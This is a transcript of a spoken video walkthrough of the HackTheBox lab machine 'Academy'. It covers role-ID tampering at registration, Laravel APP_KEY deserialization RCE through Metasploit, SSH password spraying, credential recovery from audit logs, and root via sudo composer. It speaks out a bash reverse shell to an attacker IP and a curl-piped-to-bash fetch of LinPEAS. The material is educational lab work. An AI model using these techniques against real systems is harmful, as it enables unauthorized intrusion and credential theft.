What's going on YouTube? This is Ipsec. I'm doing Academy from HackTheBox, which had 4 steps to get to root. I enjoyed all 4 steps, but my very favorite one was the first step, and that is getting a foothold on the box. It's all about attacking PHP Laravel. You find an old developer site that has an error message that leaks the application key, and with that application key, you can encrypt a serialized payload, send it to the server, and get code execution. This may sound silly, but it's something that happens in a lot of frameworks because the server itself doesn't want to track everything about a user's session, so it uses a secret only it should know, that application key, to put a bunch of information about the user, send it to them. Then that user's browser has information about themselves signed from the server and like a cookie. So when that browser sends it back to the server can view it and trust that no one modified it because only the server knows the secret to sign it. And like ASP, this is like the view state parameter, I believe. WordPress does this as well with a bunch of secrets and wp-config. Even Metasploit had an RCE around this because installing Metasploit didn't used to generate a random application key. And since it's an open source project, you could just look at GitHub, see the application key for Metasploit, and then get code execution in Ruby. So it's a super common thing of just attacking frameworks. So that's why I enjoyed this a lot. I've used it to persist between 2 different pen tests because the company doesn't rotate their secrets of the web application even though you tell them to. So then again, I just like the box because of that. So with all that being said, let's jump in. As always, we're going to start over the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, and before we can put it in a directory, we have to create that directory. So put in the nmap directory, call it academy, and then the IP address of 10.10.10.215. I'm going to run that with the sudo because nmap likes having root privileges, and then I'm also going to add the -v so it shows me open ports as it finds them, and we see just 2 ports open so far. We have 22 and 80. So I'm going to take a look at port 80. So let's go over to 10.10.10.215, and the page isn't loading. But if we look in the bottom left of a browser, we can see academy.htb. So it looks like it's redirecting us there. So I'm going to do a curl against that IP address, and wow, nmap has already finished. So before I do that, I'm going to add -p- to do all ports, just so I have it if I need it. That's the thing with recon. You can do as much as you want, and if you don't need it, it's not time wasted because it only took you seconds to run the command, and you can't really get your time back if you wanted to run more recon at a later time. So always have that running in the background. I'm adding the -v flag to curl so it shows me the headers, and we can see how that's working. We make a GET request to the web server, and it responds with a 302, which is a redirection, and then the location is academy.htb. So the web server is telling us, here, go here. I'm going to add that to my host file. So my box knows 10.10.10.215 is also academy.htb. So now when I refresh this page, we go to the page. So the very first thing I want to do is check like robots.txt, and we get not found. We could try index.html, index.php, and great, we found out it's a PHP website. There are links on this site, and we can go and view the source to see if there's anything interesting. But before I dig in too much, I just want to start a bunch of recon. So we're going to run gobuster, actually twice. So the very first time we're doing gobuster, we're going to use the directory mode. The second time we're going to do vhost to try to brute force a subdomain. So I'm going to do dir, and then word list, opt, sec list, and then discovery, web content, raft, small words. And the reason why I use this word list now, if you look at previous videos and a lot of other videos people do, they use like that directory list 2.3 small or whatever it is. I switched away from that because it did not have .get, this directory, and this is a pretty big one. So instead of just adding that directory in that file and hoping like app doesn't change it ever, I just switched to using a more up-to-date word list. So we have this word list. The next thing I want to do is specify extensions, and we want to say PHP, and then -h for host, I think, or no, U for URL. HTTP academy.htb, and then -o for out file, and I'm going to make a directory called gobuster I'll put it in the gobuster. This will be dir root.log. Awesome. So now let's do a second gobuster. So we'll do gobuster vhost, and pretty much the same exact thing. So -w opt seclist, and this time we go, well, into discovery again, but DNS instead of web content. And subdomains top million, a big number, .text. Sounds like a good domain to check. And the next flag is URL again, http academy.htb. I'm going to add the -v flag for verbose so it shows me everything, because I wanted to make sure it's brute forcing the subdomain and it wasn't trying just to like look up the virtual host MX2 without this .academy.htb. So everything looks good. So we'll do -o for out, gobuster, we'll call this vhost sub.text, and start that gobuster. So now we got two of them running. We got this nmap still running, no additional ports. We can finally go take a look at the website. So we have a PHP site with a login and register function. The very first thing I'm going to do is take a look at the login. We can try admin password. We can send this over to burpsuite, and I don't have burpsuite up and running, so let's start it. And it's going to say it's going to expire soon. In future videos, I think I'm actually going to switch to Zap Proxy and try playing that out, because we've used burpsuite for years, and I want to try out something different. But for this video, since I don't know Zap, I'm going to use burpsuite. So let's go over to proxy. Intercept is on. Go to this, turn that on. I'm going to say admin password. It's in burpsuite now, so I can send it to repeater. And then we can play with it. So it looks like invalid login is 292 bytes, or 2,929. So let's try a single quote. Nothing, double quote, nothing, into out file /temp, just see if we like crash this box. Nothing. So looks like a bunch of my SQL testing did not work. We could run this into like another brute forcer to try to brute force a password, because there is no, cross-site request forgery token. So we can easily brute force passwords here as long as the account doesn't lock out. But I don't like doing that too much. We have two brute forces going on already. Let's just copy this to a file. I'm going to make a directory called requests, and we're going to put this as login.request. So just like we did before, we're going to do more recon. So if I look in this wait, what? Created it. Did I not put it in this directory? Okay. Let's do login.req. And that's what our login looks like. Awesome. So now I can do SQL map -r login.request --batch. And we have yet another thing going. We have a high open port, 33060. That looks like a MySQL port. I think like 3306. What is default MySQL? Default MySQL. Let's turn burpsuite off. 3306, I think, is MySQL, right? Yeah, 3306. So it listening on a non-standard port tells me maybe we can try logging into this database. SQL map found nothing. We can say level 5 risk 3. They could go a bit longer. So MySQL-u root-p-h 1010 10 215 33060. Let's see. Through socket. We don't want that. Let's see. NC 1010 10 215 33060. I don't know what that port is. Service MySQL status. Am I running MySQL? I am not. So what I'm doing here is I'm starting the service I think this is. So if I netcat against myself, I can see what the header looks like. So if I do netcat localhost 3306, I can see it responds with this. So I don't think it's MySQL anymore because it's just give me blank. So get /http, what's the header look like? /1.1, broken pipe. So no idea what that is, but nmap is running scripts against it. Gobuster is still going. SQL map now is taking a while because we did it like in super verbose mode. So let's go take a look at the next piece of the website. I guess we have to go here, then we can go to register. Looks like we can register a username. So I'm going to go ipsec, password of please subscribe. And we go to successpage.php, ipsec, please subscribe. And sweet, we have the academy. Ooh, can we take courses? Does not look like it. Unlock this course. So it looks like all the functionality is kind of broken. If you don't know, if you go to academy.hackthebox.eu, there'll be a big cybersecurity training page. Highly recommend taking courses here. There's tier 0 courses which are free. And yeah, I just recommend Academy a lot. And I put a lot of content in there myself, even if I'm not listed. I do just go and vet a lot of the courses and test it out and add things. I'm trying to go to ipsec HackTheBox Academy. And if you want to know more about the Academy, here's this Academy intro video. But enough of that little small promotion. Let's see, we got in progress. The interesting thing is we registered as ipsec and we're egress. So it looks like that is hard-coded. Settings, billing, purchase cubes. I don't know what I can really click here. Based upon how this is working, this is all probably just JavaScript and everything is loaded. We can go to burpsuite, turn proxy on, make sure this is using proxy. See if we ever make a web request, but we're not. So nothing really there. Let's go back to what gobuster says. It's only 52% done. Is the out file right in stream, or is it just running at the end? root.log, sweet. grep-v 403. So I just want anything that wasn't 403. And we have images, index, login, admin, register, config, and home. So we know what home is. We probably want to look at config.php and admin.php. So let's try going to turn this. Actually, we can just cut intercept off. Go to config.php. Probably a blank page. That's typical PHP behavior. I always like viewing the source because if something's in like the brackets, then you won't see it. And we can try admin.php. Let's try ipsec. Please subscribe. One time for good measure, just in case I typoed. And we don't have anything. So let's go back to a proxy or history. Login, config, admin. We don't really have anything in burp history. I'm going to take a look at the registration function because that is the only thing we haven't looked at in depth. Maybe if I register admin and then put a space at the end, we can do some weird type confusion thing. So let's see. Intercept on, register. The reason why I intercepted, I wanted to make sure we had the space, and we also have a hidden parameter, roleid. I bet this is like not admin. Out of curiosity, I do want to see if we can register the same account twice. So if we do admin, I thought this redirected us to like /success. Yeah, success page. So if I send it again, this user exists. We don't go to success page. We do admin with 2 spaces. We do success page. So in this, you can create users with a space after the name. We'll revisit that role ID in just a second, but that is a pretty cool vulnerability, especially on like message boards, because we don't have the account admin, but we have the account admin space. So if we logged in and this wasn't like hard coded to just egress, it would say we're logged in as admin. And if there's like some type of direct messaging feature, you can do a lot of cool social engineering with that and just look like you're the user because you have a very similar name. You can also potentially abuse weird like Unicode characters. So like E with a dot over it may not be noticeable, or there's a lot of just like weird Greek characters that just look like the standard ASCII character. So you can do a lot of things like that just to make usernames look like each other. Sometimes in web code, it will do like, they'll have a trim function, which would remove spaces off admin if they're looking at the username. If username is admin, do something and grant access, but it doesn't look like it's that. So the next thing we want to do is just change this role ID to 1 and see what happens. So if I log in with IP, the password of password, and now we are an admin. And it gave us admin-page.php. So we completed the initial set of modules, the website design, test modules, separate student admin role, fix issue on dev-staging-01.academy.htb. So let's go to sudo vi etc host and add this host name and take a look at what this is. So go into this page, we get an error message. Let's see. Vendor monologue. Is this a static page or an actual error? I want to say this is a static page because I went. If I go anywhere, I get this page. That's weird. We see this is the framework Laravel or however you pronounce this. So I'm going to take a look to see if there's any exploits for Laravel. So search exploit, Laravel. Let's see, password truncation, administrative 4, unrestricted, Nova. We got a RCE and metasploit. So I'm going to do sudo msf db run, and we're going to try out metasploit. I'm curious, did this gobuster vhost finish? It has not. Let's go in the gobuster directory, cat vhost-sub. We have no directories. I'm not sure if like dev01 or whatever that is in that word list. Let's go nmap finished. SQL injection still going. Search Laravel, use 0. And I know a lot of people don't like metasploit, but I mean, if it makes your job quicker, definitely use it. And also, there are tricks to I thought it was show config. Show options, yeah. But there are tricks to understand what Metasploit's doing and use this to kind of speed up how you understand exploits. So looking at this Laravel token unserialized exec, we need an app key, the base64 encoded app key from the .env file. We have the environment, so I'm going to just search for app key, and we have a base64 value. Oh, do we have like a password? Password is secret. DB username is homestead. Homestead secret, awesome. So set app key to that. And then let's set proxies, HTTP, no slashes, 127.0.0.1, because it wants type host port. So 8080. And this is the trick I'm talking about. So Metasploit will now go to our burpsuite window, and we can analyze the exploit. Set our host. This is going to be, what is the URL? devo1 academystaging.htb. We don't need HTTP. Okay, set, vhost. We probably want to put that as the same thing. Set lhost ton0, set lport 9001, and ton0 is just my VPN IP address. So show options. It looks like everything is good. We can run this. Because we're doing a proxy, we just had to set this one variable to reverse allow proxy to true. And let's see, is burpsuite set to intercept? I'm just going to turn it off, and we have this HTTP history tab. So we started a listener, and we got a command shell open. And if we look at this, we can see what it did. So it put something in this cross-site request forgery token. So let's analyze this. Echo-n base64 -d. Looks like we got a weird object back. So I'm going to do sed s, take a comma, replace it with a line break. Sweet. So we have IV, value, and Mac. Let's take the value. Echo-n base64 -d, and we have a blob. Output, I think ENT is entropy. It's near 8 bytes. So if it's near 8 bits per byte, there's 8 bits in a byte. It's probably going to be encrypted. If we just take text, let's say etc passwd, I'm guessing this is going to be like 4.5 or something. 4.8, because that's around what ASCII is in entropy. So this is pretty darn random. So we know this is going to be encrypted, and based upon like Metasploit not doing anything but sending it here, this is most likely going to be an encrypted value based upon the application key. So what we want to do is find out how Laravel does encryption. So encryption, let's see, AES 256 CBC. So what I'm going to do is go to CyberChef, and we can look at this. So we want to decode AES 256. So AES decrypt, CBC, we got the key, the IV, and whatnot. So let's go over here. Actually, go back to this tab. Right here. We got to grab the IV. So we put the IV there, and the input is not hex, it is base64. And then the key that is on this page, where's app key? Right here. Okay. And then the input, this is going to be this blob, the value. So copy that, paste it on input, and it's not hex, it's base64. So I'm going to change it to raw because base64 is not an option here. And I'm going to go to a different recipe, or whatever this is called, operation. From base64, we put it above AES encrypt or decrypt. And let's see, change this key to be base64. And we can suddenly see how this is. So we can decrypt the value, and it's doing a PHP serialized object, and there's, I guess, a deserialization vulnerability. If you want to know more about deserialization, go to ipsec.rocks and PHP deserialization. I'd go to the intro to PHP deserialization, and that will be a good explanation of where am I? CyberChef. How this is working. So we're doing an event and we're calling Perl to do a reverse shell. It's doing the address here, 10.10.14.4, port 9001. So now that we know how that exploit works, we no longer feel bad for using metasploit because we learned something. So now with this shell, I'm going to do python 3-c import pty, pty.spawn, bin bash, and I actually don't know if this tty tricks works within metasploit, so I'm going to try it. stty raw minus echo fg. Oh god, my cell's dead. Exit, shoot. Reset. So I don't know how to fix this, so I'm going to kill this tmux pane, and we're going to redo metasploit. So lesson learned, you can't do the TTY trick to get a full shell from within metasploit. I should have known that one, but was worth trying. Let's search Laravel, use 0, app suite, our host, lhost. I'm just hitting Control R to do this. Aureport. This we need vhost. Ton 0. We don't need a proxy. Should be fine. Run. Okay. Command shell opened. So what I'm going to do is we'll listen on 9001 and say bash-c bash-i dev tcp 10.10.14.4 9001 0 at and 1. Do a standard reverse shell. Python 3-c import pty, pty.spawn bin bash stty raw minus echo fg. There we go. So now I have a regular terminal. I can export term is equal to xterm. So now I can clear the screen and we can poke around on this box. The very first thing, we had a username and password for MySQL. So mysql-u, what was it? Homestead-p, and I think secret. Let's see. It was on this page. This error. Password. Homestead secret. Maybe we have to specify the database. Homestead. -d. Homestead. Okay. Secret. I don't know why the database isn't working. -h, localhost, secret, HOMESTEAD. Huh. Let's see, host, port. Is it -lowercase h? SECRET. That's weird. Okay. Let's see if we just go to cd home. Can we make a SSH key? We can't. I was just seeing if I could put some type of persistence on the box. We can check the password. So if we go to HTTP Academy config cat database.php. forge. Let's try instead of homestead. Shoot. Let's try forge. I'm gonna have to fix my TTY real quick. Because you keep noticing how like the cursor's like jumping a bunch occasionally. It's because my STTY is wrong. So rows 34, columns 136. STTY, rows 34, calls 136. So now this should work. -D, this is forge, -U. This will be forge as well. Password of forge, password of nothing. Doesn't work. Let's see, grep-ri password. Let's see. It's pulling it from the environment again. I didn't see. Okay, it's SQLite. I wonder if the Academy page is a SQLite or something. env. Oh, it's pulling the environment variable forge. Okay. So let's see, there is a .env file. So database, homestead, username homestead, password of secret. That wasn't working. I wonder if that's where the error message is. Maybe that user doesn't exist. Yeah, maybe that's why the page just isn't working. Let's go to Academy. If it's the same way, sweet, it is. So let's do MySQL -D Academy -U dev -p and try logging in with this. Okay. I don't know. We have MySQL running on this box. Don't know what 33060 is. I'm pretty sure -D is database. MySQL-H -help. Man, MySQL. I know I could have done that from my command line. Database -D. Yeah, I'm not sure. Let's see if we can SSH with that password. So make dir pw. I don't want to make dir rm-rf pw vpw, my super password. And then let's get a list of users. So cat etsy passwd. There are quite a few. Can we read anything in home? Find -type f to dev null. Let's do -writable. Nothing. Okay. And we can get rid of writable and do a ls real quick. I see bash history. Dev null, dev null, dev null. Okay. So we're getting a list of usernames. Etsy passwd. We have a lot of these shells, and the very last thing in passwd is the login shell. Some are sh, some are bash. So what I'm going to do is grep for sh $, to show me everything that ends with sh. And that should only be a few accounts. So now I can awk-f print 1. And now we have a list of usernames. Copy v users. Okay. I'm going to go to opt crackmapexec. We can do poetry run. I think crackmap, is it CME? We'll find out. sh-u, what is it? HTB Academy users -p for password, HTB Academy PW. And see if this runs. Is it poetry crackmapexec? Nope. I wonder if I can just do CME. CME on my box is normally borked. That's why I try to run it out of this directory. Yeah. So let's see. What is that command? Oh, the command is just better syntax. I didn't put the host name. So it goes crackmapexec, protocol, host name, then arguments. And I think it's just CME. If not, let's try crackmapexec. That is not case sensitive. But looks like CME works. So now we're brute forcing SSH to see if any of these accounts work. So root, egress, Mr. Ben, Kraltic worked. So let's SSH as him. So SSH CRYZLL1TI at academy.htb. Yes, accept the key. Log in. Switch over to the bash shell because I like that shell. What do we have here? Nothing. We can run WinPEAS. So make dir www or LinPEAS opt privilege escalation. Let's get pull to pull the latest, already up to date. LinPEAS, CP LinPEAS, HTB Academy, www, and SSLNTP. Do I know what 33060 is yet? I do not know what this port is. This is driving me insane. I bet there's two databases actually. MySQL -u dev. Let's do homestead -h 127.0.0.1 33060 secret. I don't know how to specify port. -p. I don't know. I'm probably doing something wrong with that MySQL command. But when we're root, we should be able to see this port if there's another way. Or maybe the LinPEAS will tell us. So let's curl 10.10.14.4, port 8000, linpeas.sh, pipe it over to bash. Let's go into this directory, Python 3, HTTP server. And once it starts running for a few seconds, I will go up and look at the top. So, yeah. What do we have? We have the kernel right now, and it's just taking its sweet time. Okay, I was about to say, I'm about to just pause the video and we'll come to this when it finishes, but I haven't really done any editing magic so far. So, hopefully we just get one straight playthrough. Let's see, is it going to stop posting things? SUID is a good spot to stop. So let's go look at things. Sudo version. This is probably exploitable via the sudo exploit. CPU info. That BA was highlighted just because that's what I used to go to the top. Text, it is VMware. Looking at the software, processes, Lots and lots of Apache. There's my reverse shell. There's another reverse shell from Metasploit. This box is all sorts of pwned. Here's another reverse shell and another one. So we got lots going on here. Apache, cron jobs. We have a PHP cron. That's interesting. System path, HP sockets, network information, active ports. All these and time wait is probably because of my SQL map still running. Let's see. pkexec, use with console. We are in the ADM group. And that is not standard. ADM by default can read verilog. So I'm guessing we got to do something with verilog. We do have some hashes. These are in decrypt format. So we could also try cracking those. See, DB connection, app name. I'm so confused why. I'm going to try this one more time. I know in the videos I'm going to be so upset when I look at the comments and see what mistake I was making. DB pass. So this is going to be my super password. cd var www. We can go to this shell. I really want to crack other user passwords. So, Database Academy username is dev, password is this. So username is dev, database is academy. Let's see. I don't think it's a lowercase h. Let's see. MySQL client specify host. MySQL -h username password. Let's see. Academy.htb. Etsy host. ACADEMY. I don't know. I'm sure if you look in the YouTube comments, someone will say what I was missing. But we were in the ADM group. So verilog and see if we see anything here. grep-ri password. That is a lot. Apache error log. That's our gobuster. Let's see. Cloud init. That's doing interesting things of just them building the box, I guess. But it's protecting sensitive information. Get password. Let's look at the access log. So Apache. Let's see. Cat access log.1. Let's grep-v gobuster. I'm going to add I so it's not case sensitive. And we'll also get rid of this Chrome string. Let's see, options. This is nmap, I believe. Let's get rid of Firefox. Dummy. So we don't really have anything. We can do zcat on all the other logs to see what else there is. Zcat's just going to take the .gz and uncompress it and then view it. And we have a lot more. We can get rid of that as well. There was a rust buster I saw. Get rid of rust. And we have still a lot of data. So what I'm going to do is let's look at all the host. So let's just zcat this, and we will awk print 1 sort wc-l or sort unique-c. There we go. I wonder who, I guess 10.10.14.4 is me. But I'm doing zcat, so this should be older data. So who is 10.10.14.4? What is he doing? grep 10.10.14.4. Register. Using curl there, Mozilla. So 1, 2, 3, 4, 5, 6, 7. I'm gonna do the same thing, but I'm gonna try to look at the page. So where's my awk command? 7. That is mostly the pages. Sort. There's a better way to do this type of analysis. And if this part doesn't draw me to the right spot, then we will. Let's see, sort wc-c. Yeah, there's a lot of just ones. So this is probably because like gobuster and stuff was running. So this is not going to help us. So let's instead switch gears and see what other logs we have. There's audit. Is AuditD configured? Looks like it is. So if I cat audit, what is this doing? So audit, this is much like if you watch my Snoopy video on the HackTheBox channel, HackTheBox YouTube. It's actually not on my channel. Let's see, maybe just youtube.com/HackTheBox. My channel has pretty good SEO if I can mask the HackTheBox channel, but this blue team gameplay. AuditD is doing this kind of the correct way. The reason why I chose to do Snoopy and this blue team thing is because it works on more OSs. AuditD has some weird, sometimes like unique configurations per distribution. So I don't want to deal with that issue. So I use Snoopy, which is doing this, but in LD preload instead of the proper way. So we can see a list of every process that is starting. There is a program, aureport, and that's going to analyze all these audits. So if we do aureport-h, I don't know what, I was trying to do help. No, cancel. It's doing some type of statistics. There we go. So we have like TTY keystrokes, usernames, key, login. So it's going through this and just doing a report based upon things, which is pretty cool. So if we don't give it any arguments, you can see C1 changes the configuration, 20 logins, 37 failed logins, 11 different terminals. So we can do --tty to look at like the terminals and see what happened. And we see an sh, su, Mr. Ben. And I'm guessing this time they did like su and asked what user, or they did su and pasted their password, because we do have a password here. We can probably, I was gonna say we could probably see our stuff, but I don't think we can. So if we su Mr. Ben, I have 2 SUs, Emma B3N, paste the password. Do I have the password correctly? I don't have the exclamation point at the end. Probably because I double clicked and double click doesn't grab the special character at the end. Maybe that's why exclamation points are such a good special character used for password. But now we are Mr. Ben. Let's do bash cd home. And let's look at groups. I'm not a member of any group. I guess curl 10.10.14 4 port 8000 linpeas.sh, pipe it over to bash, and let's see what this one outputs. We can say sh Mr. Ben at 10.10.10.2.15. Paste the password. Bash find / -user Mr. Ben to dev null. Let's see. We can grep -v proc and run. I think were the 2 things I didn't want to see, and sys. Sys. So this is just showing me files owned by Mr. Ben. We see dev pts3. Nothing really. Just stuff in my home folder. The htaccess is unique. Deny from all, okay. PSEF, or SSLNTP. Still can't see what that 33060 is. This is finished. So let's see what we can do. The sudo exploit. This is looking to be the same. Except we got more reverse shells now. Cron jobs. We never looked at the PHP cron job. Super users, logins. Last. I wonder if to switch to the egress user, because he's logged in as well. Let's see, Apache server. Nothing too interesting. We could try going back to that MySQL thing again, going in the database, but I do not feel like doing that. Can we sudo? Password. Oh, shoot. What was his password? We should have logged that. Sudo-l. Let's go back here. Exit. Where's AU report? Mr. Ben _ academy. Sudo-l. I can run composer as any user. So I can just run composer as root. So let's go to GTFOBins and look at what composer is. Sudo. Sweet. The very first thing I'm going to do, vpw, paste this so we have that saved. And then let's see. Sudo composer run script x. So what that's doing, it's making a temp directory and then putting a file called script that's going to execute bash, and then have sudo composer working directory is our temp, and then running the script. ID, and we are root. So that is the box. Hope you guys enjoyed it. Take care, and I will see you all next week. Oh, there is academy.txt. Cat academy.txt. Just announcing that the academy is open. So yeah, take care, and I will see you all next week.